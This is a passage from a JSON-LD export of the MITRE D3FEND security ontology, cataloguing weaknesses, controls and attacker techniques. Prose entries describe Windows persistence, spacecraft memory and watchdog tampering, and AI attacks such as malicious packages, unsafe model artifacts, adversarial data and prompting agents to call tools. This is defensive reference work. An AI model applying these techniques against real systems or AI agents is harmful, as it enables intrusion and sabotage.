      "rdfs:label": "OT Change Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTWriteCommandEvent"
        },
        {
          "@id": "_:N8b5d2b13d05b481fb9f57f9afa7f1de8"
        }
      ]
    },
    {
      "@id": "_:N8b5d2b13d05b481fb9f57f9afa7f1de8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTChangeDataCommand"
      }
    },
    {
      "@id": "d3f:AML.T0011.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0011.001",
      "d3f:definition": "Adversaries may develop malicious software packages that when imported by a user have a deleterious effect.\nMalicious packages may behave as expected to the user. They may be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.",
      "rdfs:label": "Malicious Package - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0011.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0011"
      },
      "skos:prefLabel": "Malicious Package"
    },
    {
      "@id": "d3f:CWE-346",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-346",
      "d3f:definition": "The product does not properly verify that the source of data or communication is valid.",
      "rdfs:label": "Origin Validation Error",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-345"
        }
      ]
    },
    {
      "@id": "d3f:Semi-supervisedBoosting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSB",
      "d3f:definition": "Boosting methods can be readily extended to the semi-supervised setting, by introducing pseudo-labeled data after each learning step; which gives rise to the idea of semi-supervised boosting methods. The pseudo-labeling approach of self- training and co-training can be easily extended to boosting methods. Several boosting methods such as SSMBoost, ASSEMBLE, SemiBoost, RegBoost, etc can be found which can be applied for utilizing unlabeled datasets for supervised classifiers.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Boosting",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedWrapperMethod"
      }
    },
    {
      "@id": "d3f:Goal",
      "@type": "owl:Class",
      "rdfs:label": "Goal",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:EX-0012.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.03",
      "d3f:definition": "The adversary uses legitimate direct-memory commands or load services to place chosen bytes at chosen addresses. Many spacecraft support raw read/write operations, block loads into RAM or non-volatile stores, and table/file loaders that copy content into working memory. With knowledge of address maps and data structures, an attacker can patch function pointers or vtables, alter limit and configuration records, seed scripts or procedures into interpreter buffers, adjust DMA descriptors, or overwrite portions of executable images resident in RAM. Loads may be sized and paced to fit link and queue constraints, then activated by a subsequent command, mode change, or natural reference by the software.",
      "rdfs:label": "Memory Write/Loads - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Memory Write/Loads"
    },
    {
      "@id": "d3f:T1547.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.008",
      "d3f:definition": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemServiceSoftware"
      },
      "rdfs:label": "LSASS Driver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nb89a8ad1bdde400ebb9697294cb81c26"
        },
        {
          "@id": "_:N570be4bdaf5b4685af9e7fd34afa40cf"
        }
      ]
    },
    {
      "@id": "_:Nb89a8ad1bdde400ebb9697294cb81c26",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N570be4bdaf5b4685af9e7fd34afa40cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemServiceSoftware"
      }
    },
    {
      "@id": "d3f:CWE-574",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-574",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives.",
      "rdfs:label": "EJB Bad Practices: Use of Synchronization Primitives",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-695"
        },
        {
          "@id": "d3f:CWE-821"
        }
      ]
    },
    {
      "@id": "d3f:instructed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x instructed-by y: A subject x takes machine instructions from object y.",
      "rdfs:label": "instructed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-MITREATTACKAuthorizationEnforcement",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://attack.mitre.org/mitigations/M0800/"
      },
      "d3f:kb-abstract": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector [1], while IEEE 1686 defines standard permissions for users of IEDs.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperatingModeRestriction"
      },
      "d3f:kb-reference-title": "MITRE ATT&CK - Authorization Enforcement",
      "rdfs:label": "Reference - MITRE ATT&CK - Authorization Enforcement"
    },
    {
      "@id": "d3f:CredentialTransmissionScoping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialTransmissionScoping"
      ],
      "d3f:d3fend-id": "D3-CTS",
      "d3f:definition": "Limiting the transmission of a credential to a scoped set of relying parties.",
      "d3f:isolates": {
        "@id": "d3f:Credential"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WebAuthentication_AnAPIForAccessingPublicKeyCredentialsLevel2"
      },
      "d3f:synonym": "Phishing Resistant Authentication",
      "rdfs:label": "Credential Transmission Scoping",
      "rdfs:seeAlso": [
        {
          "@id": "https://pages.nist.gov/TIG-Stage/sp800-63c.html"
        },
        {
          "@id": "https://www.w3.org/TR/webauthn-2/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N8f8ae217c4184971b52ad3dc810e1fec"
        }
      ]
    },
    {
      "@id": "_:N8f8ae217c4184971b52ad3dc810e1fec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:ApplicationInstaller",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application installer is a user application designed to install, configure, and deploy another application.",
      "rdfs:label": "Application Installer",
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:CWE-1289",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1289",
      "d3f:definition": "The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value.",
      "rdfs:label": "Improper Validation of Unsafe Equivalence in Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-1164",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1164",
      "d3f:definition": "The product contains code that is not essential for execution, i.e. makes no state changes and has no side effects that alter data or control flow, such that removal of the code would have no impact to functionality or correctness.",
      "rdfs:label": "Irrelevant Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-301",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-301",
      "d3f:definition": "Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user.",
      "rdfs:label": "Reflection Attack in an Authentication Protocol",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WindowsNtOpenThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens a handle to a thread object with the access specified.",
      "rdfs:label": "Windows NtOpenThread",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/devnotes/ntopenthread"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITraceThread"
      }
    },
    {
      "@id": "d3f:EX-0012.11",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0012.11",
      "d3f:definition": "Watchdogs supervise liveness by requiring software to “pet” within defined windows or the system resets. Threat actors manipulate WDT behavior by changing timeout durations, windowed-WDT bounds, reset actions, enable/mask bits, or the source that performs the petting (e.g., moving it into a low-level ISR so higher layers can be stalled indefinitely). Software WDTs can be disabled or starved; hardware WDTs are influenced via control registers, strap pins, or supervisor commands that alter prescalers and reset ladders. Outcomes include preventing intended resets so runaway tasks consume power and bandwidth, or forcing repeated resets at tactically chosen moments, e.g., during updates or handovers, to keep the system in a degraded or easily predictable state. The technique converts a safety mechanism into a tool for either unbounded execution or rhythmic disruption, depending on how the WDT parameters are rewritten.",
      "d3f:modifies": {
        "@id": "d3f:WatchdogTimer"
      },
      "rdfs:label": "Watchdog Timer (WDT) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/11/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0012"
        },
        {
          "@id": "_:Nda4ee909a7c546fbbc987fbbc0f2dc1e"
        }
      ],
      "skos:prefLabel": "Watchdog Timer (WDT)"
    },
    {
      "@id": "_:Nda4ee909a7c546fbbc987fbbc0f2dc1e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WatchdogTimer"
      }
    },
    {
      "@id": "d3f:LogicalRules",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LR",
      "d3f:definition": "A logical rule matches event data or set of values to a conditional expression and results in the determination of a truth value, which may be used to determine the next action or step to take.",
      "d3f:kb-article": "## How it works\n\nLogic rules define a set of patterns that in some patterns must match input data. If the the conditions are met, then the rule will \"fire\" and some action will be taken, usually notifying a person or another system that the event being monitored needs further processing or attention.\n\n## Key Test Considerations\n\n- **Performance (Accuracy)** Identify instances in data where rule is expected to be triggered. Implement traceability and metrics for individual rule performance. Traceability of cases could be implemented as unit tests or as part of a fine-grained classification performance platform. For simple rule-based matching systems with many rules, individual rules may be unused or may create unusually high false positives (or false negatives relative to expectation.\n\n- **Performance (Computational)** Generate model performance measures (see Classification Performance Measures), esp. a confusion matrix for each rule and identify outliers and relative contribution of rule to overall performance.\n\n## References\n1. Event condition action. (2019, Nov 21). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Event_condition_action).\n2. Business rule. (2023, April 10). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Business_rule).\n3. YARA. (2023, June 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/YARA).",
      "rdfs:label": "Logical Rules",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicLogic"
      }
    },
    {
      "@id": "d3f:CWE-603",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-603",
      "d3f:definition": "A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check.",
      "rdfs:label": "Use of Client-Side Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-602"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000663_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ExecutionIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization (or information system) enforces explicit rules governing the installation of software by users.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-000663"
    },
    {
      "@id": "d3f:CWE-322",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-322",
      "d3f:definition": "The product performs a key exchange with an actor without verifying the identity of that actor.",
      "rdfs:label": "Key Exchange without Entity Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-306"
      }
    },
    {
      "@id": "d3f:LinuxOpenArgumentO_RDONLY-O_WRONLY-O_RDWR",
      "@type": "owl:Class",
      "d3f:definition": "Opens a file specified by pathname.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/open.2.html"
      },
      "rdfs:label": "Linux Open Argument O_RDONLY, O_WRONLY, O_RDWR",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:JobSchedule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ScheduledJob"
      },
      "d3f:definition": "A job schedule contains specification of tasks to be executed at particular times or time intervals.  The schedule is a plan that enacted by a task scheduling process. In Windows, the schedule can be accessed at 'C:\\Windows\\System32\\Tasks' or in the registry. In Linux, the schedule is located at '/etc/crontab'",
      "d3f:modified-by": {
        "@id": "d3f:JobSchedulerSoftware"
      },
      "d3f:synonym": "Task Schedule",
      "rdfs:label": "Job Schedule",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Cron"
        },
        {
          "@id": "dbr:Windows_Task_Scheduler"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:N9118da452ebd4902b41296b57e753c7d"
        },
        {
          "@id": "_:N630a4569e41445f3adb08b01176cc334"
        }
      ]
    },
    {
      "@id": "_:N9118da452ebd4902b41296b57e753c7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "_:N630a4569e41445f3adb08b01176cc334",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedulerSoftware"
      }
    },
    {
      "@id": "d3f:AML.T0085.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0085.001",
      "d3f:definition": "Adversaries may prompt the AI service to invoke various tools the agent has access to. Tools may retrieve data from different APIs or services in an organization.",
      "rdfs:label": "AI Agent Tools - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0085.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0085"
      },
      "skos:prefLabel": "AI Agent Tools"
    },
    {
      "@id": "d3f:PhysicalLock",
      "@type": "owl:Class",
      "d3f:definition": "A lock is a mechanical latching device for securing moveable portions of physical barriers in a secured position.",
      "rdfs:label": "Physical Lock",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Lock_and_key"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "d3f:CWE-348",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-348",
      "d3f:definition": "The product has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.",
      "rdfs:label": "Use of Less Trusted Source",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:T1125",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:DigitalCamera"
        },
        {
          "@id": "d3f:VideoInputDevice"
        }
      ],
      "d3f:attack-id": "T1125",
      "d3f:definition": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.",
      "rdfs:label": "Video Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N2d3ae80a3619454b8873fe08e2b9e5df"
        },
        {
          "@id": "_:Nb18ad1012e54446da5e984449d7d9590"
        }
      ]
    },
    {
      "@id": "_:N2d3ae80a3619454b8873fe08e2b9e5df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalCamera"
      }
    },
    {
      "@id": "_:Nb18ad1012e54446da5e984449d7d9590",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VideoInputDevice"
      }
    },
    {
      "@id": "d3f:may-corrupt",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-corrupt y: They entity x may corrupt y's information content; that is, 'x corrupts y' may be true.",
      "rdfs:label": "may-corrupt",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1275",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1275",
      "d3f:definition": "The SameSite attribute for sensitive cookies is not set, or an insecure value is used.",
      "rdfs:label": "Sensitive Cookie with Improper SameSite Attribute",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:AML.T0011.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0011.000",
      "d3f:definition": "Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect.\nThe adversary can use this technique to establish persistent access to systems.\nThese models may be introduced via a [AI Supply Chain Compromise](/techniques/AML.T0010).\n\nSerialization of models is a popular technique for model storage, transfer, and loading.\nHowever, this format without proper checking presents an opportunity for code execution.",
      "rdfs:label": "Unsafe AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0011.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0011"
      },
      "skos:prefLabel": "Unsafe AI Artifacts"
    },
    {
      "@id": "d3f:T1054",
      "@type": "owl:Class",
      "d3f:attack-id": "T1054",
      "d3f:definition": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1562.006",
      "rdfs:label": "Indicator Blocking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1562.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0043",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043",
      "d3f:definition": "Adversarial data are inputs to an AI model that have been modified such that they cause the adversary's desired effect in the target model.\nEffects can range from misclassification, to missed detections, to maximizing energy consumption.\nTypically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary's intended effect.\nFor example, an adversarial input for an image classification task is an image the AI model would misclassify, but a human would still recognize as containing the correct class.\n\nDepending on the adversary's knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](/techniques/AML.T0043.000), [Black-Box Optimization](/techniques/AML.T0043.001), [Black-Box Transfer](/techniques/AML.T0043.002), or [Manual Modification](/techniques/AML.T0043.003).\n\nThe adversary may [Verify Attack](/techniques/AML.T0042) their approach works if they have white-box or inference API access to the model.\nThis allows the adversary to gain confidence their attack is effective \"live\" environment where their attack may be noticed.\nThey can then use the attack at a later time to accomplish their goals.\nAn adversary may optimize adversarial examples for [Evade AI Model](/techniques/AML.T0015), or to [Erode AI Model Integrity](/techniques/AML.T0031).",
      "rdfs:label": "Craft Adversarial Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Craft Adversarial Data"
    },
    {
      "@id": "d3f:CWE-684",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-684",
      "d3f:definition": "The code does not function according to its published specifications, potentially leading to incorrect usage.",
      "rdfs:label": "Incorrect Provision of Specified Functionality",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1533",
      "@type": "owl:Class",
      "d3f:attack-id": "T1533",
      "d3f:definition": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.",
      "rdfs:label": "Data from Local System - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Data from Local System"
    },
    {
      "@id": "d3f:CWE-303",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-303",
      "d3f:definition": "The requirements for the product dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.",
      "rdfs:label": "Incorrect Implementation of Authentication Algorithm",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WindowsNtWriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes data to an open file.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntwritefile"
      },
      "rdfs:label": "Windows NtWriteFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:DiscriminantAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DA",
      "d3f:definition": "Discriminant analysis attempts to establish whether a set of variables can be used to distinguish between two or more groups of cases.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)",
      "rdfs:label": "Discriminant Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:MultivariateAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-HostDiscoveryCommands_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-03-001/"
      },
      "d3f:kb-abstract": "When entering on a host for the first time, an adversary may try to discover information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. The information returned may impact choices an adversary can make when establishing persistence, escalating privileges, or moving laterally.\n\nBecause these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2016-03-001: Host Discovery Commands",
      "rdfs:label": "Reference - CAR-2016-03-001: Host Discovery Commands - MITRE"
    },
    {
      "@id": "d3f:Plan",
      "@type": "owl:Class",
      "rdfs:label": "Plan",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:T1547.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547.012",
      "d3f:definition": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)",
      "rdfs:label": "Print Processors",
      "rdfs:subClassOf": {
        "@id": "d3f:T1547"
      }
    },
    {
      "@id": "d3f:SPARTAImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0009"
      },
      "rdfs:label": "Impact Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Naa0de76286f64d6f8875fbad33d9aefe"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:Naa0de76286f64d6f8875fbad33d9aefe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0009"
      }
    },
    {
      "@id": "d3f:CWE-1061",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1061",
      "d3f:definition": "The product does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend.",
      "rdfs:label": "Insufficient Encapsulation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "skos:example",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:Technique",
      "@type": "owl:Class",
      "rdfs:label": "Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:Plan"
      }
    },
    {
      "@id": "d3f:CWE-372",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-372",
      "d3f:definition": "The product does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner.",
      "rdfs:label": "Incomplete Internal State Distinction",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-000382_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization configures the information system to prohibit or restrict the use of organization-defined functions, ports, protocols, and/or services.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000382"
    },
    {
      "@id": "d3f:T1040",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1040",
      "d3f:definition": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.",
      "d3f:may-produce": {
        "@id": "d3f:DNSLookup"
      },
      "rdfs:label": "Network Sniffing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N19a58bd394504648be24449e035d973c"
        }
      ]
    },
    {
      "@id": "_:N19a58bd394504648be24449e035d973c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_15",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Detection of Unsanctioned Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(15)"
    },
    {
      "@id": "d3f:CWE-404",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-404",
      "d3f:definition": "The product does not release or incorrectly releases a resource before it is made available for re-use.",
      "rdfs:label": "Improper Resource Shutdown or Release",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T1602.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1602.002",
      "d3f:definition": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.",
      "rdfs:label": "Network Device Configuration Dump",
      "rdfs:subClassOf": {
        "@id": "d3f:T1602"
      }
    },
    {
